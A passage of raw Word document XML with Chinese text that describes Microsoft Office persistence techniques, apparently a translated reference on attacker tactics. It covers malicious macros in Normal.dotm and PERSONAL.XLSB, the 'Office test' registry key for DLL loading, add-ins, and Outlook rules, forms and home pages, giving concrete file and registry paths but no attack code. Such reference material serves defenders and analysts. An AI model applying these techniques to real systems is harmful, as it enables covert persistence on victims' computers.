            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57E3FA18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFE4A40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是企业网络中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统上相当常见的应用套件。启动基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用时，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>多种配套</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>机制获得持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397369CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>办公模板宏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE63D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含的模板是常见</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的一部分，用于自定义样式。每当应用启动时都会使用应用中的基本模板。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3919CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office VBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Basic for Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）可以插入到基本模板中，并在相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用启动时执行代码，从而获得持久性。已发现并发布了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的示例。默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ord</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>normal.dotm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板，该模板可以修改并插入恶意宏。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>xcel</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>模板文件，但是可以添加一个。添加后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>自动加载此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FC07E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Normal.dotm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Users(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA84E48" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Personal.xlsb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Users(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFF5F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能需要启用宏才能不受限制地执行，具体取决于系统或企业的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>宏使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B444B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917C2FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现一个注册表位置。一个动态链接库引用放在此处时，每次</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用启动后，都会执行二进制路径指向的相应动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA06AA1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282792F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D8D22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项可向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序添加功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C19D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项也可用于获取持久性，因为它们可以设置为在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用启动时执行代码。各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品可以使用不同类型的加载项，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Word/Excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WLL/XLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Office </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项、自动化加载项、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VSTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Studio Tools for Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）加载项和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556E67A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则、表单和主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4ACB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中发现了多种可被滥用以获得持久性的功能，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则、表单和主页。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2B7FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则允许用户定义自动行为来管理电子邮件。例如，定义一条</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>规则让</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发件人的包含特定单词的邮件转移到特定文件夹。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会创建恶意规则</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>在攻击者发送邮件给指定用户后触发代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6888E74E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件中用作演示文稿和功能模板。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用此表单</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送他们特制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电子邮件时会触发代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E9458" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主页是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>老功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹的演示文稿。此功能允许文件夹</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>打开时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载和显示内部或外部</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会制作恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>utlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>主页加载此页面时会触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DDB39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要使用这些功能，攻击者需要事先通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exchange / OWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器或客户端应用访问用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱。一旦恶意规则、表单或主页添加到用户的邮箱，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动时就会加载它们。如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
